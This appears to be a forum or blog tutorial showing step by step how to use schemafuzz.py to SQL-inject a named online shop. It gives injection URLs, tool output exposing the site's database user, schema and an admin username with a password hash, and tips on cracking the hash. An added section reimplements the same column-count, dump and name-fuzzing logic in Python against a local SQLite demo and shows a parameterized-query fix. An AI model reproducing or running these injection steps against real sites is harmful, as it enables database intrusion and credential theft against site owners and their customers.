What you need:
1. Python
2. schemafuzz.py
3. CMD

Open CMD and cd into the folder where schemafuzz.py lives.
The general syntax is >> schemafuzz.py -u "target" --option
(Use plain double quotes in the real command line; the curly quotes a blog editor inserts will not work in CMD.)

To make it clearer, let's go straight to the target, wkwkwkwk

1. Find a target. This is ours >>>
http://www.sleeppost.com/viewproduct.php?pid=923

2. Find the number of columns
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923" --findcol

and you get:

[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923--
[+] Evasion Used: "+" "--"
[+] 09:44:10
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,
[+] Column Length is: 7
[+] Found null column at column #: 0
[+] SQLi URL: http://www.sleeppost.com/viewproduct.ph … +UNION+SELECT+0,1,2,3,4,5,6--
[+] darkc0de URL: http://www.sleeppost.com/viewproduct.ph … +1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6
[-] Done!

So this is the URL we use for injecting:
http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6
The word "darkc0de" sits in the column the tool found reflected back in the page (column #0 here); in every later step the tool swaps its own queries into that spot, and AND 1=2 makes the original row disappear so only the injected row is shown.

3. Find the databases
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --dbs


[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+darkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 09:56:47
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] ??sleeppo_store?

[-] 09:57:00
[-] Total URL Requests 3
[-] Done

There, the db name is right there, wkwkwkkw: sleeppo_store

4. Find the table names in the db
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --schema -D sleeppo_store


[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+darkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:02:56
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing Tables & Columns from database "sleeppo_store"
[+] Number of Tables: 20

[Database]: sleeppo_store
[Table: Columns]

[0]advertisement: id,image,url
[1]brands: name
[2]category: cid,parent,name
[3]config: adminemail1,adminemail2,adminemail3,salesemail,enquiryemail,adminlogi
n,adminpassword,orderemailsubject,orderemailheader,orderemailfooter,orderwebhead
er,orderwebfooter,sms
[4]emailgroup: gid,name
[5]emailgroupmember: gid,email
[6]emails: email,name
[7]faqreply: fid,faqquestion,faqanswer,fdate
[8]faqrequest: fid,email,faqquestion,fdate,status,name,contact
[9]news: nid,title,detail,ndate,link_cid,link_pid,active
[10]orderitem: ordernum,pid,pname,vid,brand,variance,price,sellprice,discount,qty,type
[11]orders: ordernum,name,email,contact,address,status,country,ddate,dname,demai
l,dcontact,daddress,dcountry,paytype,worldpayid,ttime,remarks,refno,deliverydate
,deliverytime,paymentmode,remarks2
[12]outlet: outlet_id,outlet_name,outlet_address,outlet_tel
[13]product: pid,cid,brand,name,pno,detail,recommend
[14]productrel: pid,vtype,variance
[15]productvariance: vid,pid,variance,thick,vtype,vno,detail,price,sellprice,firm,colour
[16]promotionitems: id,promotion_id,item_type,cid,brand,pid,vid,discount,rating
[17]promotions: promotion_id,title,detail,startdate,enddate
[18]users: uid,name,email,contact,address
[19]warranty: wid,name,address,email,submitdate,date,invoice,model,size,period,s
urvey,qty

[-] 10:24:51
[-] Total URL Requests 139
[-] Done

So that site has 20 tables, and their columns are listed too. Just pick the one you want to go after :p

5. Dump the table and columns
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --dump -D sleeppo_store -T config -C adminlogin,adminpassword


[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+darkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:36:59
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Dumping data from database "sleeppo_store" Table "config"
[+] and Column(s) ['adminlogin', 'adminpassword']
[+] Number of Rows: 3

[0] liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn:
[1] No data
[2] No data
[3] No data

[-] 10:37:36
[-] Total URL Requests 5
[-] Done

xixixi... there's the username and the password. Note that the adminpassword value is a 32-hex-character hash (MD5-shaped), not ciphertext, so there is nothing to "decrypt": you crack it with a wordlist or look it up in a hash database, and if the app had salted it, it might never come back at all wink

The steps above work on MySQL 5, where --dbs and --schema read table and column names out of information_schema. MySQL 4 has no information_schema, so there you use --fuzz, which guesses table and column names from a wordlist and keeps the ones the server doesn't error on.

ex: schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --fuzz
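To show what the tool is actually doing under the hood in steps 2 to 5 and in --fuzz, here is an added example. It is not part of the original post and not schemafuzz.py's own code: it rebuilds the vulnerable viewproduct.php pattern on a local SQLite database with made-up rows, runs the same column-count, reflected-column, dump and name-guessing logic against it, and shows the parameterized query that stops all of it. The table and column names (product, config, adminlogin, adminpassword) are borrowed from the page's output; the rows, the <dc0de> marker and the sample hash are assumptions made for the demo. SQLite has no concat() or information_schema, so || is used where MySQL would use concat(), and the error-driven logic is exactly what a MySQL 4 --fuzz run relies on.

```python
import re
import sqlite3

# Constructed demo data, NOT the real site's: a SQLite stand-in for viewproduct.php that borrows
# the table/column names the page reports (product, config) but holds made-up rows.
def build_demo_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE product (pid INTEGER, cid INTEGER, brand TEXT, name TEXT,
                              pno TEXT, detail TEXT, recommend INTEGER);
        INSERT INTO product VALUES (923, 4, 'Acme', 'Foam Pillow', 'FP-1', 'Soft pillow', 1);
        CREATE TABLE config (adminlogin TEXT, adminpassword TEXT);
        INSERT INTO config VALUES ('admin', 'e10adc3949ba59abbe56e057f20f883e');  -- md5('123456')
    """)
    return db

def vulnerable_page(db, pid):
    """The flaw: pid is glued into the SQL text, so 'pid=923 AND 1=2 UNION ...' gets executed."""
    sql = "SELECT pid,cid,brand,name,pno,detail,recommend FROM product WHERE pid=" + pid
    rows = db.execute(sql).fetchall()
    # Only name (column 3) and detail (column 5) make it into the HTML, as on a real product page.
    return "".join(f"<h1>{r[3]}</h1><p>{r[5]}</p>" for r in rows)

def safe_page(db, pid):
    """The fix: a bound parameter is a value, never SQL, so the injected string just matches nothing."""
    sql = "SELECT pid,cid,brand,name,pno,detail,recommend FROM product WHERE pid=?"
    rows = db.execute(sql, (pid,)).fetchall()
    return "".join(f"<h1>{r[3]}</h1><p>{r[5]}</p>" for r in rows)

MARK = ("<dc0de>", "</dc0de>")  # assumed marker wrapped around results so they can be cut out of the HTML

def find_column_count(page, base, max_cols=20):
    """--findcol: grow 'UNION SELECT 0,1,...' until the DB stops erroring on the column count."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(n))
        try:
            page(f"{base} AND 1=2 UNION SELECT {cols}")
            return n
        except sqlite3.OperationalError:
            continue  # count mismatch: try one more column
    return None

def find_reflected_columns(page, base, n):
    """Which UNION positions show up in the page (the tool's 'null column')."""
    cols = ",".join(f"'{MARK[0]}{i}{MARK[1]}'" for i in range(n))
    html = page(f"{base} AND 1=2 UNION SELECT {cols}")
    return [int(x) for x in re.findall(rf"{MARK[0]}(\d+){MARK[1]}", html)]

def dump(page, base, n, slot, table, columns):
    """--dump -T table -C col1,col2: concatenate the columns into the reflected slot and read them back."""
    parts = [str(i) for i in range(n)]
    parts[slot] = f"'{MARK[0]}'||" + "||':'||".join(columns) + f"||'{MARK[1]}'"  # MySQL: concat()
    html = page(f"{base} AND 1=2 UNION SELECT {','.join(parts)} FROM {table}")
    return re.findall(rf"{MARK[0]}(.*?){MARK[1]}", html)

def fuzz_names(page, base, n, candidates, table=None):
    """--fuzz (MySQL 4, no information_schema): guess table names, or column names inside `table`,
    and keep the guesses the server does not reject."""
    hits = []
    for name in candidates:
        cols = [str(i) for i in range(n)]
        if table is not None:
            cols[0] = name
        sql = f"{base} AND 1=2 UNION SELECT {','.join(cols)} FROM {table or name}"
        try:
            page(sql)
            hits.append(name)
        except sqlite3.OperationalError:
            pass  # 'no such table' / 'no such column'
    return hits

def run_demo():
    db = build_demo_db()
    page = lambda pid: vulnerable_page(db, pid)  # stands in for fetching the URL
    n = find_column_count(page, "923")
    reflected = find_reflected_columns(page, "923", n)
    return {
        "columns": n,
        "reflected": reflected,
        "creds": dump(page, "923", n, reflected[0], "config", ["adminlogin", "adminpassword"]),
        "tables": fuzz_names(page, "923", n, ["users", "config", "product", "admin"]),
        "config_cols": fuzz_names(page, "923", n, ["password", "adminlogin", "adminpassword"], table="config"),
        "safe": safe_page(db, "923 AND 1=2 UNION SELECT 0,1,2,3,4,5,6"),
    }

if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k}: {v}")
```

Against the demo database the column count comes out as 7 (like the page's run), the reflected positions are 3 and 5 instead of the page's #0, the dump returns admin:&lt;hash&gt; in one string just as the tool prints login:password, and the same injected pid handed to safe_page() returns an empty page because the bound parameter never becomes part of the SQL.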

Some of the options:
--fuzz >>> guess table and column names (MySQL 4, no information_schema)
--schema >>> list the tables and their columns; -D picks the database
--dump >>> read the contents of columns; -D, -T and -C pick the database, table and columns
--findcol >>> find the number of columns and the reflected ("null") column, and print the darkc0de URL

Go find the rest yourself. Just read the help.

Downloads:
Python
Schemafuzz.py